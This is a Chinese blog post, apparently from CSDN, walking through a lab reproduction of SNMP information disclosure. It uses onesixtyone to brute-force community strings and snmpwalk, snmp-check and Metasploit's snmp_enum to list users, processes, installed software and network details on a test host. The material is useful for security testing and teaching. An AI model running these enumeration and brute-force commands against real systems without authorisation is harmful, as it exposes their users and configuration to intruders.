SNMP信息泄露可读指令

最新推荐文章于 2024-08-16 07:58:46 发布
最新推荐文章于 2024-08-16 07:58:46 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CNXBDSa/article/details/121158797
版权

snmp信息泄露可读指令

SNMP(简单网络管理协议):该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况。目前共有 V1、V2、V3 三个版本,应用比较广泛的还是前两个版本,同时存在安全问题也较多。PS:本次复现宿主机snmp端口未开启,也可以进行信息读取

复现准备

复现需要一台windows server打开snmp服务 参考https://www.xxshell.com/946.html
一台kali作为攻击机

SNMP扫描工具onesixtyone

参数:

  • -c 文件与社区名称的尝试
    -i 文件与目标主机
    -o 输出日志
    -p 指定一个备用的SNMP目的端口
    -d 调试模式,使用两次获取更多信息
    -s short模式,只打印IP地址
    -w n等待n毫秒(1/1000秒)发送数据包(默认10)

首先在你不知道团体社区名称 可使用onesixtyone字典对宿主机进行团体社区爆破,

dpkg  -L onesixtyone

在这里插入图片描述
然后使用onesixtyone进行爆破

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt  192.168.23.154  -o 123.log -w  100

在这里插入图片描述当然也支持批量爆破

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt  -i 1.txt -o 123.log -w  100

snmpwalk获取信息

snmp 服务器的默认密码为 public

-v: 指定SNMP协议版本 有1|2c|3 一般使用2c
-c: 密钥 指定连接设备SNMP读密码

snmpwalk 192.168.23.154 -c public -v 2c

获取ip信息

snmpwalk 192.168.23.154 -c public -v 2c  .1.3.6.1.2.1.4.20

获取内存信息

snmpwalk 192.168.23.154 -c public -v 2c  .1.3.6.1.2.1.25.2.2

当前进程列表

 .1.3.6.1.2.1.25.4.2.1.2

系统用户列表

 .1.3.6.1.4.1.77.1.2.25.1.1

列 出 域 名

.1.3.6.1.4.1.77.1.4.1.0

列出安装软件

.1.3.6.1.2.1.25.6.3.1.2

列出系统信息

 .1.3.6.1.2.1.1

SNMP扫描工具snmp-check

获取信息,比较全

snmp-check 192.168.23.154 -c public -v 2c

参数:
-p——port: SNMP端口。默认端口为161;
-c——community: SNMP团体字。默认是公开的;
-v——version: SNMP版本号(1,2c)。默认是1;
-w——write:检测写访问(通过枚举分离操作);
-d——disable_tcp:禁用TCP连接枚举!
-t——timeout:超时时间。默认是5;
-r——retries:请求重试。默认是1;
-i——info:显示脚本版本;
-h——help:显示帮助菜单;

Msf获取信息

auxiliary/scanner/snmp/snmp_enum
作用:获取到community 如果有可读权限可以使用这个模块读取系统信息
在这里插入图片描述

阿波次的鹅佛鸽
关注
专栏目录
SNMP服务存在可读口令(CVE-1999-0516,CVE-1999-0517)​​​​​​​猜测出远程SNMP服务存在可登录的用户名口令
wsyzxss的博客
04-25 4249
SNMP服务存在可读口令(CVE-1999-0516,CVE-1999-0517)猜测出远程SNMP服务存在可登录的用户名口令
snmp 默认 端口_多种设备基于 SNMP 协议的敏感信息泄露漏洞数据分析报告
weixin_39575565的博客
12-18 893
作者:知道创宇404实验室01更新情况02事件概述SNMP协议[1],即简单网络管理协议(SNMP,Simple Network Management Protocol),默认端口为 161/UDP,目前一共有3个版本:V1,V2c,V3。V3是最新的版本,在安全的设计上有了很大改进,不过目前广泛应用的还是存在较多安全问题的V1和V2c版本。SNMP协议工作的原理简单点来说就是管理主机向...
onesixtyone 快速上手与实践指南
最新发布
gitblog_00420的博客
08-16 839
onesixtyone 快速上手与实践指南 onesixtyoneFast SNMP Scanner项目地址:https://gitcode.com/gh_mirrors/on/onesixtyone 1. 项目介绍 onesixtyone 是一个由 Trail of Bits 团队设计并实现的快速SNMP(Simple Network Management Protocol)扫描器。它的目标是...
SNMP口令的利用以及一些相关知识(图)
xymyeah
11-20 1902
很多人开始明白对于WIN2K来说,关闭了TCP139和445端口以后,安全性会提高很多,起码很多对系统信息的刺探扫描也无法进行了。    一般来说,的确是这样。但要做到真正完善的安全,还需要从每一个细节去考虑是否会存在隐患。    比如,对于完全安装的WIN2K或者说启动了 简单网络管理协议(SNMP)的系统来说,仍然将存在非常致命的隐患,完全将你的系统暴露给所有人。    一、从SNMP说起  
SNMP口令介绍 对初学者非常有用
07-22
提供SNMP口令的使用说明, 对初学者非常有用。了解一下snmp协议
snmpwalk分析snmp信息泄露
weixin_34372728的博客
06-01 314
2019独角兽企业重金招聘Python工程师标准>>> ...
SNMP口令详解
热门推荐
prochsh的专栏
01-15 1万+
1、获取linux主机名,内核版本信息snmpget -v2c -c public localhost .1.3.6.1.2.1.1.1.0 snmpwalk -v 2c -c public 172.18.4.106 SNMPv2-MIB::sysName.0//获取主机名 snmpwalk -v 2c -c public 172.18.4.106 SNMPv2-MIB::sysDesc
snmp口令引起的信息泄漏
weixin_30887919的博客
07-08 1953
0x00 snmp协议简介 snmp协议即简单网络管理协议(SNMP,Simple Network Management Protocol)。目前一共有3个版本:V1,V2c,V3。V3是最新的版本,在安全的设计上有了很大改进。不过目前广泛应用的还是存在较多安全问题的V1和V2c版本,本文讨论的内容也是基于这两个版本。 了解更多snmp协议内容可以参考维基百科 顾名思义,snmp是...
深入探讨SNMP协议及口令利用技巧
资源摘要信息:"该文件是关于SNMP(简单网络管理协议)的学习资料,内容涉及到SNMP口令的利用方法,以及与SNMP协议相关的基础知识。同时,还包含了使用Visual C语言进行SNMP协议开发的相关知识点。" 知识点详细说明...
Kali Linux工具大全-信息收集
anquanniu的博客
09-08 3381
俗话说的好:工欲善其事,必先利其器。这一次,安全牛课堂 & 苑房弘老师,再度合作!发布《Kali Linux 工具大全》系列课程。本套技术系列课程,包含5门独课程,涵盖了 Kali Linux 当中全部约 600 个安全工具的理论与实战用法讲解。 主要针对有一定计算机和网络基础知识的技术爱好者、渗透测试者、安全从业者和未来打算投身安全领域的学生。理论与实战并重,让你知其然更知其所以然,拒绝成为一知半解的工具党。 本篇介绍『Kali Linux工具大全』技术系列的第一部分:信息收集。信息收集是渗透测试
SNMP协议与网络安全
SNMP(Simple Network Management Protocol)是一种用于网络管理的标准协议,可用于监视连接到网络的设备的运行状况、收集统计信息以及对网络设备进行配置。它使用在IP网络上的应用层协议,由管理站点和被管理设备...
SNMP 口令的利用
|独自望海。。。
12-16 1323
来源:ITLab很多人开始明白对于WIN2K来说,关闭了TCP139和445端口以后,安全性会提高很多,起码很多对系统信息的刺探扫描也无法进行了。  一般来说,的确是这样。但要做到真正完善的安全,还需要从每一个细节去考虑是否会存在隐患。  比如,对于完全安装的WIN2K或者说启动了 简单网络管理协议(SNMP)的系统来说,仍然将存在非常致命的隐患,完全将你的系统暴露给所有人。  一、从SNMP说起
centos7开启snmp服务及验证测试
wo1769815的专栏
02-12 2592
yum -y install net-snmp net-snmp-utils snmpd -v //查看版本号 v3验证方式,在snmpd.conf末尾添加以下内容: vi /etc/snmp/snmpd.conf rouser user auth createUser user MD5 myPassword 第一行: rouser:用于设定只读帐号的类型 user:设定用户名, aut...
SNMP口令的利用以及一些相关知识
lanndmentt的专栏
11-14 913
很多人开始明白对于WIN2K来说,关闭了TCP139和445端口以后,安全性会提高很多,起码很多对 系统信息的刺探扫描也无法进行了。 一般来说,的确是这样。但要做到真正完善的安全,还需要从每一个细节去考虑是否会存在隐患。 比如,对于完全安装的WIN2K或者说启动了 简单网络管理协议(SNMP)的系统来说,仍然将存在 非常致命的隐患,完全将你的系统暴露给所有人。   一、从SNMP说起
snmp口令扫描及系统信息查看
05-24
snmp口令扫描及系统信息查看 本工具包含有界面版的BPsnmputil 以及命令行下的snmputil 工具说明都有,自己看, 好用就是好用,说多了也没用,自己看
SNMP学习
Hakkazhongli的博客
06-25 1276
功能介绍 SNMP是Simple Network Management Protocol(简单网络管理协议)的缩写,一般在需要使用网管软件对设备进行监控管理时,需在设备上配置该功能。 目前 SNMP 支持以下版本: SNMPv1 :简单网络管理协议的第一个正式版本,在 RFC1157 中定义。 SNMPv2C: 基于共同体 (Community-Based)的SNMPv2管理架构, 在RFC1901中定义的一个实验性协议。 SNMPv3 :通过对数据进行鉴别和加密,...
SNMP信息收集与利用
旺仔Sec&blog
12-01 1049
3.在本地PC渗透测试平台BT5中调用snmpwalk工具测试服务器场景server2003是否开启Windows SNMP服务(共同体为默认字符串为public,通过对目标靶机的.1.3.6.1.2.1.25.1.6分支进行snmpwalk来测试服务的开放情况(SNMP 版本为v2c),并将该操作使用的命令中必须要使用的参数作为FLAG提交(各参数之间用英文分号分割,例a;扫描软件的扫描速度可能比较慢我们在扫描的过程中使用ping命令对靶机进行扫描,辅助软件操作,此时扫描正在对网络进行扫描探测。
SNMP协议原理与网络设备监控
SNMP协议概述 ## 1.1 什么是SNMP协议 SNMP(Simple Network Management Protocol)是一种用于网络管理的标准协议,最初由互联网工程任务组(IETF)定义,并广泛应用于各种网络设备的管理和监控中。SNMP协议通过...
snmp默认团体名/弱口令漏洞及安全加固
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
06-14 1万+
在运行SNMP服务的设备上,若管理员配置不当运行默认团体名/弱口令访问,将导致敏感信息泄露。敏感不限于系统运行的进程、已安装的软件、系统存在的用户,运行的服务,端口情况等。通过这些信息,攻击者可以清晰的了解到设备整体情况,根据开放的端口和服务快速定位可入侵点,根据运行的进程名判断是否存在哪些防护软件,有什么bypass的方法。1> 开始—>程序—>管理工具—>服务—>SNMPService—>属性—>安全 在这个配置界面中,可以修改“社区名称”(community strings),也就是snmp密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值